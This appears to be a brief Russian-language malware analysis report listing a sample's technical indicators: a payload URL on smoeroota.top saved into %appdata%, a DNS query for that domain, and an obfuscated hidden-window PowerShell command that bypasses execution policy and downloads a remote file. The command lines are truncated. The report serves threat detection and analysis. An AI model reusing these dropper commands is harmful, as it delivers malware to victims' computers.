Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Ow^ErS^He^L^l.^exE ^-ExE^cUti^OnP^ol^iCy ^B^Yp^A^S^s ^-^nopr^o^FiLE^ -^WI^nD^owS^t^yLE hiDd^EN (^Ne^w-o^BJE^CT SysTem.nE^T^.wE^b^CL^iE^NT).doW^n^lO^Ad^Fi^lE('http://smoer...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "P^Ow^ErS^He^L^l.^exE ^-ExE^cUti^OnP^ol^iCy ^B^Yp^A^S^s ^-^nopr^o^FiLE^ -^WI^nD^owS^t^yLE hiDd^EN (^Ne^w-o^BJE^CT SysTem.nE^T^.wE^b^CL^iE^NT).doW^n^lO^Ad^Fi^lE('http://smoer...' (со скрытым окном)